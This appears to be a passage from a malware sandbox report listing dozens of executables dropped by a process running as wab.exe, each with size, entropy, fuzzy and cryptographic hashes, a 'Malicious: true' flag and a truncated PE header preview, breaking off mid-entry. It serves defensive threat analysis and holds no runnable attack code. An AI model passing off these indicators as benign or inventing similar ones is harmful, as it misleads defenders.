SHA-256: 7D83AF575B7894583D69E20CDD399EB544D332C954FCB12AEB43A5A6F1DAC047
SHA-512: 0A6BC7A997199CB5C9143CF3F43BE8B81E40B58D6AF9DEE68E9919B81253837BC2FD6E68FFB1CDA24AF7BB2F16BE6125842461F2B11E702A74B150A1D236F90A
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 149792
Entropy (8bit): 6.130839286683668
Encrypted: false
SSDEEP: 3072:/rk34vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:kpsB+09zMH7cCxPd
MD5: DDB50C235FC41D325CA396E4DADB7D03
SHA1: 78447DA5E4E2A5B956AAF7EB1D78381BD18B276A
SHA-256: 788B5CA09B6419BF4676C910284222425739E975D3933C7A797A6F7374B1CF4D
SHA-512: BE2091EFC648E42A85E7849A10016AC5F207972C856BF38585E214F6C3A24226D976AA75C93CA6EDD3EFB03A28D65F1FF1B21F8EA2685FA2DB8FC4855CE5D25C
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 227104
Entropy (8bit): 5.96400865851122
Encrypted: false
SSDEEP: 3072:/rkmWt9h8QlLISqG+T1Dpd9qEKLmoY46WeJ2B+O3dnDiani3F8I1rXRA/:9Wt9h8QlLISZWVRohcq7dvni3F8QrBA/
MD5: 0E040A535A5DAEE44210398E9D623F8A
SHA1: 68EAF347AF330274DCCC0163AF3B7BED78FA5130
SHA-256: B1C1D4C7B6831A94636669F6FEEA80A8E74BDCA5AFCF9353E8530F48A903E3A9
SHA-512: 867BCC2EE42376C1EFE28A1CDDF55F4363BF058308D0D1DCDF741F6BF48E7201912B9666D30C9E8D75FFEA836BF17E1B4241CE913506FBA3EE48B08523B7D886
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 264480
Entropy (8bit): 6.442315114933131
Encrypted: false
SSDEEP: 6144:7wCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:7w6JmRI6Bitwpx+iQafFykG1da6edo
MD5: 3396F7DBBB1ED342742ACAD901459B6B
SHA1: 43BF682467DC7EE333A6FF5DFF7E44C26A522C31
SHA-256: 748DB965A420E06E4439E26B26729B52CB38A8EC1170912EFFE56EB4331EBACE
SHA-512: C04F847FFF847251C182647680041DCC9CF4706A2C4C0EA0F2294A1085880BD01D2154D06C714310D8D604402B6B316428BF9A6A9193DB3E8CDC7CCFA48865AB
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):149792
                                                                                                Entropy (8bit):6.131209533569252
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkr4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:IksB+0YlEXAe6QPt
                                                                                                MD5:0F315CC3D7FC51F663E1A006F0BFDBDB
                                                                                                SHA1:59A12C582E0D917D4973FF3A79604869101CB322
                                                                                                SHA-256:2948901E015CA1C99F320EF6FA7EB3AE4C21019DBFAD3512D6C88BACF2179229
                                                                                                SHA-512:320E0A4E1F548B1DAA5D3675D8910ED135D0142BCD6A661C8E0D123A0368DF870B6110EE2DED79354C96F3EC23038C4F9E2DA2C9B5E3B483D0F6B0B40F7C5574
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.630224066462407
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                                                MD5:4839E0285791329EE319914A14C4C058
                                                                                                SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                                                SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                                                SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):135808
                                                                                                Entropy (8bit):5.942801479985879
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoQrmKWGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nBs8m:/rkpqsyutjZqMNbSgxbFrj8m
                                                                                                MD5:1F06DC6B1D2291AE551234B3109FA2FE
                                                                                                SHA1:0BEA3FB19461017340CA691040D8E3A36F5FE4EF
                                                                                                SHA-256:D7FBD9840C2638B6C3B02BED388863AC27D3DFCB09E50F056868E5CC85F8EE0B
                                                                                                SHA-512:579F76483C73D69ABCAD7CA4B36D2E920A7B81897F95C17E782EAA791783855A37C271CD9A236ED366BE67618D4B443D2D941F69DEC037A101FAB47443418FF0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.632805023719349
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                                                MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                                                SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                                                SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                                                SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):437888
                                                                                                Entropy (8bit):6.304281817676703
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                                                MD5:9547D26AD745DF9D0CCE708C32590984
                                                                                                SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                                                SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                                                SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):163456
                                                                                                Entropy (8bit):5.9115526693507805
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk6446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:r446d7T/H4X
                                                                                                MD5:D1AF6B8FE233EC36D374D8A19B6CF350
                                                                                                SHA1:54763AEFB38E704722815851C81CCF785A157345
                                                                                                SHA-256:F93DA943A2FFB890D923439A90A7AD11C44D4385426E4AE7B50BA3CCAA271C0A
                                                                                                SHA-512:41A1C1C56AFEA4805A857F5CD7D58C2DD15142003388A93378E63D5F5B5A9206AA78F43F084D1B57894D262F8A58507C33C202454E3D48D3DF7E82E63188FF04
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):127104
                                                                                                Entropy (8bit):5.559603073488415
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoAs8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8nBsb:/rkkUkEsqzy7pxI8BszFJqkb
                                                                                                MD5:A436A95C872F8E726BE28BD3F28FECA3
                                                                                                SHA1:1B969154E933EE587DD09120290997AEAD912D07
                                                                                                SHA-256:5E454A2DA6110838B52A0E2B6574C113898CBC987175F7DF2D25D91B9CBF3D39
                                                                                                SHA-512:B7859034075CB8FCF718C85BA15864AD764BF615D38C592A584F1F03D1390317A43760EFEED1FCFF44677E90ABB943CA88891008B879277FC529AD24FC833F68
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):223360
                                                                                                Entropy (8bit):5.817153710128924
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk6ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlZBnD:ZSyMZOy406qS2AroAxnw6f9JCXN1
                                                                                                MD5:0E90F4C1D272BDFD6BF6FFAD932C914F
                                                                                                SHA1:E3979345722CFF61E13670F831832BD0071028C1
                                                                                                SHA-256:F3BC6D48071C74BC60549F00E279DB05B5C95549745422198E362CE8714C443B
                                                                                                SHA-512:852E831A8647F12D88A50260A0F3AF938AE6C7F41D0FAE08B6C8D811B848F41A7317F42618759B3FBFABC004A84D8F3AE5DA9AE5AC4CF8C0F85FF02C03843E8C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):203264
                                                                                                Entropy (8bit):6.382288995818921
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:WiFIf34hcUsz225/
                                                                                                MD5:A758FF4E11CABD90381BF2DF8C94A835
                                                                                                SHA1:3CF64CC942DABBA8D259C1BBBCAD8A8A5758FAFD
                                                                                                SHA-256:6E96E7D72730FEC7AE5FBE319E54618D70944803BF81CF43381A7FBA3CF213F3
                                                                                                SHA-512:BEF5CECFF18253A3273CA2826AF4B30A373195A8F1ED638A23A87A22BC0EEC0140A498888265B123236315E734C872B459041AA68577CFB264A3ACA3AC521E7D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):209912
                                                                                                Entropy (8bit):6.052889138927242
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                                                MD5:4D184C059578DB44A1F50ECA0F228274
                                                                                                SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                                                SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                                                SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):209912
                                                                                                Entropy (8bit):6.052889138927242
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                                                MD5:4D184C059578DB44A1F50ECA0F228274
                                                                                                SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                                                SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                                                SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):264144
                                                                                                Entropy (8bit):5.5958416454167645
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkaPEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:vPEC0QjWGNU6ITL1H0zvjkBA+7891
                                                                                                MD5:44E9513BAB2A6092C7CD0F427E1FEDB4
                                                                                                SHA1:42DD7A45E394541E5741CFA40209724E01F50D7D
                                                                                                SHA-256:E613392D586721152E8B8F90369A483B43EB6E15756FD90327BA2825C0FCD919
                                                                                                SHA-512:93D991C50A228F6F20FB8D1C54AD82DF6409742A8C5BFC4030158CAEDA575C818EF317AA694F08F35112C4D2289FF12DDBD937F954137D5F799AA2476F27DFA2
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):430680
                                                                                                Entropy (8bit):6.507043587745356
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:0mmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Jmt0LDdOUO42ZdocuI4kxBgGONqEL
                                                                                                MD5:07C7EC19924DA741A70E2A34F6D38D1C
                                                                                                SHA1:2FA274520A2DE8DF40E463DDB24B74E117250AC0
                                                                                                SHA-256:5679106DE217223E2447D42372E4A17255BF639B15930856A8D15E25CE3E890A
                                                                                                SHA-512:40FF7E018B6EE45F1C16736F692347B1BD7B29D809651AD4F95C8AEB4EB949743E9701ABF1DA31D8ACA34276985A554DFA39EECB6033C569EDFEF500A0302DE6
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4473576
                                                                                                Entropy (8bit):6.558895341897284
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                                                MD5:4855130B5C1085421920C85105178634
                                                                                                SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                                                SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                                                SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4316096
                                                                                                Entropy (8bit):3.9033569901477474
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:9PNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:JNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                                                                                MD5:A5CA18C848C5701C8854BB35BD56574A
                                                                                                SHA1:005BF3164DF9CA7270124E3AF626845CFE1D09E8
                                                                                                SHA-256:FD61D8809B0673D3B2E54A167F82F37B5345CD65285FACC8DA6C9EAFD6AD4524
                                                                                                SHA-512:DEEF87CC41230B4888A7E0937C8A918B61186372B9ABE36069507C2E5B64976EE74439CA136907AFE11C23B737E8134E342F51412558B3E6CDA4A80610A1DE0E
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):94600
                                                                                                Entropy (8bit):5.808950203405244
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VozELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:/rkaE/OTKXI/etG8ICILJ
                                                                                                MD5:92CCB6717B855AAB9FC8F2DD5704DF9E
                                                                                                SHA1:A992665A3EED482629E382BA98CC00D29BD96B08
                                                                                                SHA-256:7C5D9FF38A44CC39E7023D44A89B1B2F7CE3EDD4C7292C89E82018319BE3CF9B
                                                                                                SHA-512:B267F5DB062B05E844D0AC159040CD2BC88257E05B47E70275AD3629DC0331CD53E113D0F4CF6E7105551F13D5DF3C8EBE1CA05E519D84DDD9FA523AE730C8C5
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):101496
                                                                                                Entropy (8bit):5.614417533237859
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoDvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzc:/rk2ToATzvmN0KRm8bOzc
                                                                                                MD5:7F19345545B8DA667991DEEC3D8F6468
                                                                                                SHA1:66EC1140DD4F3811E4E000E94340469CE42108B4
                                                                                                SHA-256:FD49A52DE21C968484C90DEFEBE9B41A900C0C83D0578B931FFF41A02F6041B3
                                                                                                SHA-512:898F2CCF7F289256A57278D79B9D9F0AFBAE6AEC3761404D00A3C1B98E0467188F33B6C4B0B19CC687DFEEFC2408F4A5D3C3D4FD3BAFA4FE258E922CFC52A76C
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):455760
                                                                                                Entropy (8bit):5.80402506379432
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:cwACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:cwACThwSSn2dRANtlF3j
                                                                                                MD5:3B0A8B5E4045F2972D8139D1EB68FF5D
                                                                                                SHA1:91653217660FF749728075DFCDD7DD3935D6DD07
                                                                                                SHA-256:795757B494CE9CF653E25E61512370283B0DCE892F0FA4AD641CE5353BB2E9D7
                                                                                                SHA-512:EBA564D4D158CD2FDBA10A915D2837958EAD114E0A71F31AECDE8BC54A1EBAFE305279A90429D98A7BB6214623D667C704A31B2E788EE974EADB02E0FDB9CEE4
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225704
                                                                                                Entropy (8bit):5.993164766056159
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkRLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:mjilq8OPwRzso6AQ5yC
                                                                                                MD5:978D692068FFF1979AA85A22C7774B82
                                                                                                SHA1:3356A00B00B04A3DEB7DB995C45990D0C2C99947
                                                                                                SHA-256:0402398E41C93D6925AD34ED076C935E32A0D3437F04621A40A1B36AD83E9855
                                                                                                SHA-512:8410502EB44D2FC186609AC25F29796475F0FCA44688D3266C95FC09FCB350A9ACF7B247797FD9CE71EE4A5D8CCC6F0F32DCFFDA2D5FC5626C7D4C3B6539FD28
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):84928
                                                                                                Entropy (8bit):5.709408438671853
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoY67wZClMML07MiapFmPRHyzMwzobtM+zf:/rkN67wZClMMQ7MiawHyzMwsL
                                                                                                MD5:322701BC6FF92F3789B1C9105C11F393
                                                                                                SHA1:16B5BE10FE983EA904C06891581F127C03915C41
                                                                                                SHA-256:6097218FB5318A7671C154F5D06BCB888296D7BD5E301F6DC3D73363CBEF9713
                                                                                                SHA-512:6549D7DECCDE4489BC04508E562372B94F834EEAEFBAFCF8FB65B600FDF13338AFAA47F9412DC886E38B7E782DBF464AFE37847C4CBB75C3D88759F17AD08208
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):83816
                                                                                                Entropy (8bit):5.759188593692372
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoP0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:/rkat7wZClMMQ72ahnGzextQyxtE
                                                                                                MD5:9D3499779ECEF0A457BB315144B20EFC
                                                                                                SHA1:F144F384645733E14C1D1923241135D6CD9DA04B
                                                                                                SHA-256:A2A2F6C89369BB6F130D363510E05964829C18F9B928D7836628051C06233675
                                                                                                SHA-512:FEB9CB23D90149AD2CC9EB037B5B9DD810070863EBB3D5787B6BA84C6F98ED496C19201EFCBC0C4A23F835497A4A789E0824FDEA1840D728D334CF240EF38D15
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):233832
                                                                                                Entropy (8bit):6.144128303355593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkGW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:g2GhN0lsdspzPgg1
                                                                                                MD5:D932FC7F938D7FAA076BDF0F32C1C14C
                                                                                                SHA1:289A2046B00A40433ED38C2E87BDB29EBF58D63E
                                                                                                SHA-256:FCC50AE05512C451B0F9C0C89582C0F8411C1A52A99F1C51AD39902478BE59E4
                                                                                                SHA-512:DF559DBD4E0918B205C94F2BE0361C7FD50BC9431AF41A90EAB35743B288EA208F658799E0CA96D29892D6A89A9F5A37DE6DB5684B898526F39B0AE46A8F9C4A
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):502632
                                                                                                Entropy (8bit):6.587262136505295
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:RWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:2MxCvm7JK6JAB/6N30xpI
                                                                                                MD5:097728BC9E3AD3C6955B58A1CCB73D23
                                                                                                SHA1:832DDD4349D69A41DC22131C341094A55742EE68
                                                                                                SHA-256:1D19D526CB1E90C4C0553E74ED0DD07996AA9379764D76FAFFA2C8394A8BF81D
                                                                                                SHA-512:DAE8E3CC44495E9A3FD45AA4DA02123DEE714AF06E88DAEAA8FC4F03CAD53B07CF3DB47F90C95E01CF65F2B045F9BE6F8CEF15908224226EE7C54E902519C77A
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):352704
                                                                                                Entropy (8bit):6.234328618673098
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:TEshacHeGXduZtZ9zHVcI3uv7FgR3FTzWQ/ZZyp1:IsHHrtuZtPvh3FuQ/jyp1
                                                                                                MD5:23DBC58CDF96B3DC8D931BCBCD1F0259
